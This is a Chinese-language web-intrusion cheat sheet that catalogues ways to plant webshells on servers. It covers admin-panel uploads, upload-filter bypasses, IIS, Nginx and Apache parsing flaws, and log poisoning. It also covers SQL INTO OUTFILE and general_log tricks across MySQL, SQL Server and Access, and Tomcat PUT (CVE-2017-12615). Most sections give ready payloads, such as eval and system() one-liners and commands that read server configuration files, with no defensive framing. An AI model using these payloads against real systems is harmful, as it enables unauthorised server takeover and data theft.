進后臺Getshell

管理員后臺直接Getshell

管理員后臺直接上傳Getshell，有時候帶密碼的Webshell連接時容易被waf攔截，可以上傳不加密的Webshell如有權限限制可以嘗試管理后臺自帶的修改文件名功能在文件名前加../來穿越目錄，如上傳的文件為a.php，將a.php修改為../a.php。

后臺數據庫備份Getshell

后臺數據庫備份getshell，上傳圖片馬并獲取圖片馬路徑，通過數據庫備份修改后綴名，如有后綴名無法修改或路徑無法修改限制可修改前端代碼繞過，當所備份的數據庫來源無法修改時，我們可以通過首先將一句話木馬寫入數據庫，比如通過新建管理員用戶，將用戶名用一句話木馬代替（用戶名通常有長度限制，在前端修改maxlength即可），<%eval request ("pass")%> 然后再通過備份數據庫后訪問此界面Getshell。

各類上傳Getshell

https://choge.top/2020/02/29/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%AB%98%E7%BA%A7%E5%88%A9%E7%94%A8/

修改網站上傳類型Getshell

修改網站上傳類型，后臺設置中添加aasps|asp|php|jsp|aspx|asa|cer，保存后上傳aasps文件，上傳后為asp文件可以解析Getshll

上傳其他腳本類型Getshell

一臺服務器有多個站，如a網站為asp腳本，b網站為php腳本，而a中限制了上傳文件類型為asp的文件，此時可以上傳php的腳本，來拿shell；也可以嘗試腳本文件后綴名改為asa或者在后面直接加個.如xx.asp.來突破文件類型限制進行上傳來Getshell

解析漏洞Getshell

IIS6.0解析漏洞

http://www.xxx.com/xx.asp/xx.jpg
http://www.xxx.com/xx.asp/xx.txt
http://www.xxx.com/xx.asp/xx.asp;jpg

IIS7.0/7.5、Nginx<8.0解析漏洞

http://www.xxx.com/xx.jpg/.php

Nginx<8.03空字節代碼執行漏洞

版本范圍：Nginx0.5.,0.6., 0.7 <= 0.7.65, 0.8 <= 0.8.37

http://www.xxx.com/xx.jpg%00.php

Apache解析漏洞

http://www.xxx.com/xx.php.owf.rar逆向解析，直到能解析出php為止

CVE-2013-4547 Nginx解析漏洞

http://www.xxx.com/xx.jpg（非編碼空格）\0.php

編輯器漏洞Getshell

傳送門：

https://navisec.it/%e7%bc%96%e8%be%91%e5%99%a8%e6%bc%8f%e6%b4%9e%e6%89%8b%e5%86%8c/

網站配置插馬Getshell

進入后臺后，網站配置插馬getshell，可以找到源碼本地搭建，插入時注意與源碼閉合，如果插入出錯可能導致網站報廢。如asp中單引號表示單行注釋作用"%><%eval request("v01cano")%><%'

編輯器模版Getshell

通過網站的模版編寫一句話，然后生成腳本文件getshell 通過將木馬添加到壓縮文件，把名字改為網站的模版類型，上傳到服務器，getshell）（新建或修改目錄名為xx.asp/ 此目錄下的jsp，html會以asp執行，配置iis6.有0解析漏洞

修改腳本文件Getshell

修改后臺腳本文件插入一句話直接Getshell，盡量插在頭和尾。

###上傳插件、更新頁面Getshell

wordpress，dz等，如編輯wordpress404頁面插入一句話，可以先下載對應版本找到404路徑，部分OA上傳插件Getshell， jboss，tomcat上傳war包getshell等

執行sql語句寫入Webshell

首先執行錯誤的sql語句，使其暴露出網站的根目錄，以ecshop為例，進入后臺執行sql查詢

select "<?php phpinfo();?>" into outfile "C:\\vulcms\\ecshopv3.6\\ecshop\\v01cano.php";

關于此語句說明，在windows中有時候需要使用斜杠/有時候需要使用雙反斜杠\末尾有時候需要分號，有時候也不需要分號。也可以先將一句話通過ecshop的新建管理員寫入到user表中，然后通過數據庫備份配合解析漏洞Getshell。

命令執行Getshell

Windows

echo ^<^?php @eval($_POST[C0cho]);?^>^ >c:\1.php

復制

Linux

echo -e "<?php @assert(\$_POST[C0cho])?>" > 1.php

復制

Linux需要在$前加\進行防轉義，Windows需要在<前加^防轉義，Windows和Linux中的 “可以使用’或不使用進行嘗試

文件包含Getshell

文件包含有時可繞過waf

asp包含

include file="123.jpg"`調用的文件必須和被調用的文件在同一目錄，否則找不到，如果不在同一目錄，用下面語句也使用如下代碼`include virtual="文件所在目錄/123.jpg"

php包含

<?phpinclude('123.jpg');?>

復制

使用php://input

使用burpsuite截取數據包，并修改內容轉發(還可以使用hackbar工具中的post data中輸入<?php fputs(fopen("shell1.php","w"),'1111<?php @assert($_POST[xss])?>2222')?>等一句話木馬)

截取get請求

將一句話木馬

瀏覽器訪問查看是否成功

數據庫命令執行Getshell

Access導出

Access可導出xxx等文件需要配合解析漏洞

create table cmd (a varchar(50));
insert into cmd (a) values ('一句話木馬')   # 一句話木馬如：<%execute request(1)%>select * into [a] in 'e:\web\webshellcc\1.asa;x.xls' 'excel 4.0;' from cmd drop table cmd

菜刀直連https://www.webshell.cc/1.asa;x.xls

Sqlserver導出

exec sp_makewebtask 'C:\test1.php','select "<%eval request("pass")%>" '--

Mysql導出

以phpMyAdmin為例

方式一

create TABLE xiaoma (xiaoma1 text NOT NULL);insert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma]);?>');select xiaoma1 from xiaoma into outfile 'D:/phpstudy/www/7.php';drop TABLE IF EXISTS xiaoma

方式二

select "<?php eval($_POST[v01cano]);?>" into outfile 'D:/phpstudy/www/a.php'

方式三

當數據庫路徑未知時Getshell

//創建表a,并且將httpd.conf寫入到表a中create table a(a text);load data infile "C:/phpStudy/Apache/conf/httpd.conf" into table a;

復制

然后執行導出操作，將該文件下載，使用notepad++打開，最后搜索documentroot，即可找到網站的根目錄：

文件可能存在的一些路徑：

Windowsc:\windows\php.ini                    php配置文件
c:\windows\system32\inetsrv\MetaBase.xml       # IIS虛擬主機配置文件 
Linux/etc/php.ini                              php配置文件
/etc/httpd/conf.d/php.conf/etc/httpd/conf/httpd.conf        # Apache配置文件
/usr/local/apache/conf/httpd.conf/usr/local/apache2/conf/httpd.conf/usr/local/mysql/user/local/httpd/conf/httpd.conf/usr/local/apache/conf/extra/httpd-vhosts.conf # 虛擬目錄配置文件
/user/local/nginx/conf/httpd.conf              # Nginx配置文件

方式四通過load_file函數直接加載該文件內容

select load_file('C:/phpStudy/Apache/conf/httpd.conf');

同時需要做如下配置

方式五

general_log_file方法獲取Webshell

show global variables like 'secure%'顯示secure_file_priv的值為NULL，不能利用寫into outfile寫木馬getshell。

show global variables like "%genera%";  #查看genera文件配置情況set global general_log = off;   #關閉general_log  set global general_log = 'on';  #如果general_log關閉需要開啟set global general_log_file = 'D:/www/web/shell.php'

方式六

可執行命令方式

select '<?php echo \'<pre>\'; system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'd:/www/shell.php'

使用方法

www.xxx.com/shell.php?cmd=ipconfig  #cmd=后面加命令

方式七

過殺毒軟件方式

上傳圖片馬c.jpg，圖片馬內容如下：

<?php

導出Webshell

select '<?php include 'c.jpg'?>' INTO OUTFILE 'D:/work/www/shell.php'

方式八

直接導出加密Webshell

select unhex('加密代碼') into dumpfile 'D:/www/web/shell.php'

不進后臺Getshell

0day Getshell

各類OA，coremail，cms，php框架，數據庫，java框架等0day，1day，nday Getshell

寫入日志Getshell

獲取日志路徑，在訪問過程中在url或者其他位置寫入<?php eval($_POST[c]);?>等信息，使其日志記錄此代碼，然后訪問日志路徑，菜刀連接Getshell，如phpinfo();中能查看到error.log和access.log的路徑。

IIS/Tomcat寫權限Getshell

IIS6.0，put協議上傳手工或工具，批量掃描工具：iis put scaner，寫權限利用：桂林老兵

Tomcat put上傳 CVE-2017-12615 工具傳送門：

https://link.zhihu.com/?target=https%3A//github.com/iBearcat/CVE-2017-12615

上傳漏洞Getshell

https://choge.top/2020/02/24/upload-labs%E8%AE%B0%E5%BD%95/

上傳會員頭像Getshell

將Webshell放入文件夾，然后壓縮成zip文件。上傳正常頭像抓包將圖片文件內容刪除，burp右鍵選擇文件黏貼功能，將zip包內容復制到burp中的圖片內容，放行后菜刀連接圖片上傳路徑下的文件夾（zip壓縮包名）下的Webshell

注入漏洞Getshell

https://choge.top/2020/03/19/MsSQL%E6%B3%A8%E5%85%A5/

遠程命令執行

參考Linux/Windows反彈shell，腳本語言、powershell反彈shell，Kali/Cobalt Strike等各種上線方法

其他漏洞Getshell

XXE，SSRF，反序列化，strust2等一種或多種組合利用Getshell